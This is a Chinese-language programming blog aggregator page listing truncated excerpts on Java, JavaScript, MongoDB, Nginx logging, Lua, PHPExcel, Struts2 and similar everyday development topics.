    // for循环的进化 // 菜鸟 for (var i = 0; i < Things.length ; i++) { // Things[i] } // 老鸟 for (var i = 0, len = Things.length; i < len; i++) { // Things[i] } // 大师 for (var i = Things.le
  • 网络编程Socket和ServerSocket简单的使用 百合不是茶 网络编程基础IP地址端口
      网络编程;TCP/IP协议   网络:实现计算机之间的信息共享,数据资源的交换   协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去   端口:用于计算机之间的通信      每运行一个程序,系统会分配一个编号给该程序,作为和外界交换数据的唯一标识 0~65535   查看被使用的
  • JDK1.5 生产消费者 bijian1013 javathread生产消费者java多线程
    ArrayBlockingQueue:        一个由数组支持的有界阻塞队列。此队列按 FIFO(先进先出)原则对元素进行排序。队列的头部 是在队列中存在时间最长的元素。队列的尾部 是在队列中存在时间最短的元素。新元素插入到队列的尾部,队列检索操作则是从队列头部开始获得元素。 ArrayBlockingQueue的常用方法:
  • JAVA版身份证获取性别、出生日期及年龄 bijian1013 java性别出生日期年龄
            工作中需要根据身份证获取性别、出生日期及年龄,且要还要支持15位长度的身份证号码,网上搜索了一下,经过测试好像多少存在点问题,干脆自已写一个。 CertificateNo.java package com.bijian.study; import java.util.Calendar; import
  • 【Java范型六】范型与枚举 bit1129 java
    首先,枚举类型的定义不能带有类型参数,所以,不能把枚举类型定义为范型枚举类,例如下面的枚举类定义是有编译错的   public enum EnumGenerics<T> { //编译错,提示枚举不能带有范型参数 OK, ERROR; public <T> T get(T type) { return null;
  • 【Nginx五】Nginx常用日志格式含义 bit1129 nginx
    1. log_format 1.1 log_format指令用于指定日志的格式,格式:   log_format name(格式名称) type(格式样式)   1.2 如下是一个常用的Nginx日志格式:   log_format main '[$time_local]|$request_time|$status|$body_bytes
  • Lua 语言 15 分钟快速入门 ronin47 lua 基础
    - - 单行注释 - - [[      [多行注释] - - ]]   - - - - - - - - - - - 1. 变量 & 控制流 - - - - - - - - - - num = 23 - - 数字都是双精度 str = 'aspythonstring'
  • java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 ) bylijinnan java
    the idea is from: http://blog.csdn.net/zhanxinhang/article/details/6731134 public class MaxSubMatrix { /**see http://blog.csdn.net/zhanxinhang/article/details/6731134 * Q35 求一个矩阵中最大的二维
  • mongoDB文档型数据库特点 开窍的石头 mongoDB文档型数据库特点
    MongoDD: 文档型数据库存储的是Bson文档-->json的二进制 特点:内部是执行引擎是js解释器,把文档转成Bson结构,在查询时转换成js对象。 mongoDB传统型数据库对比    传统类型数据库:结构化数据,定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的    文档型数据库:不用定好数据结构,
  • [毕业季节]欢迎广大毕业生加入JAVA程序员的行列 comsci java
        一年一度的毕业季来临了。。。。。。。。      正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业,可以考虑来我们软件行业,做一名职业程序员。。。      软件行业的开发工具中,对初学者最友好的就是JAVA语言了,网络上不仅仅有大量的
  • PHP操作Excel – PHPExcel 基本用法详解 cuiyadll PHPExcel
    导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties
  • IBM Webshpere MQ Client User Issue (MCAUSER) darrenzhu IBMjmsuserMQMCAUSER
    IBM MQ JMS Client去连接远端MQ Server的时候,需要提供User和Password吗? 答案是根据情况而定,取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。 http://stackoverflow.com/questions/20209429/how-mca-user-i
  • 网线的接法 dcj3sjt126com
    一、PC连HUB (直连线)A端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 二、PC连PC (交叉线)A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 三、HUB连HUB&nb
  • Vimium插件让键盘党像操作Vim一样操作Chrome dcj3sjt126com chromevim
    什么是键盘党? 键盘党是指尽可能将所有电脑操作用键盘来完成,而不去动鼠标的人。鼠标应该说是新手们的最爱,很直观,指哪点哪,很听话!不过常常使用电脑的人,如果一直使用鼠标的话,手会发酸,因为操作鼠标的时候,手臂不是在一个自然的状态,臂肌会处于绷紧状态。而使用键盘则双手是放松状态,只有手指在动。而且尽量少的从鼠标移动到键盘来回操作,也省不少事。 在chrome里安装 vimium 插件
  • MongoDB查询(2)——数组查询[六] eksliang mongodbMongoDB查询数组
    MongoDB查询数组 转载请出自出处:http://eksliang.iteye.com/blog/2177292 一、概述  MongoDB查询数组与查询标量值是一样的,例如,有一个水果列表,如下所示: > db.food.find() { "_id" : "001", "fruits" : [ "苹
  • cordova读写文件(1) gundumw100 JavaScriptCordova
    使用cordova可以很方便的在手机sdcard中读写文件。 首先需要安装cordova插件:file 命令为: cordova plugin add org.apache.cordova.file 然后就可以读写文件了,这里我先是写入一个文件,具体的JS代码为: var datas=null;//datas need write var directory=&
  • HTML5 FormData 进行文件jquery ajax 上传 到又拍云 ileson jqueryAjaxhtml5FormData
    html5 新东西:FormData  可以提交二进制数据。 页面test.html <!DOCTYPE> <html> <head> <title> formdata file jquery ajax upload</title> </head> <body> <
  • swift appearanceWhenContainedIn:(version1.2 xcode6.4) 啸笑天 version
      swift1.2中没有oc中对应的方法: + (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION;  解决方法: 在swift项目中新建oc类如下: #import &
  • java实现SMTP邮件服务器 macroli java编程
    电子邮件传递可以由多种协议来实现。目前,在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP,下面分别简单介绍。   ◆ SMTP 协议   简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议,用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的
  • mongodb group by having where 查询sql qiaolevip 每天进步一点点学习永无止境mongo纵观千象
    SELECT cust_id, SUM(price) as total FROM orders WHERE status = 'A' GROUP BY cust_id HAVING total > 250 db.orders.aggregate( [ { $match: { status: 'A' } }, { $group: {
  • Struts2 Pojo(六) Luob. POJOstrust2
    注意:附件中有完整案例 1.采用POJO对象的方法进行赋值和传值 2.web配置 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee&q
  • struts2步骤 wuai struts
    1、添加jar包 2、在web.xml中配置过滤器 <filter>        <filter-name>struts2</filter-name>        <filter-class>org.apache.st
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他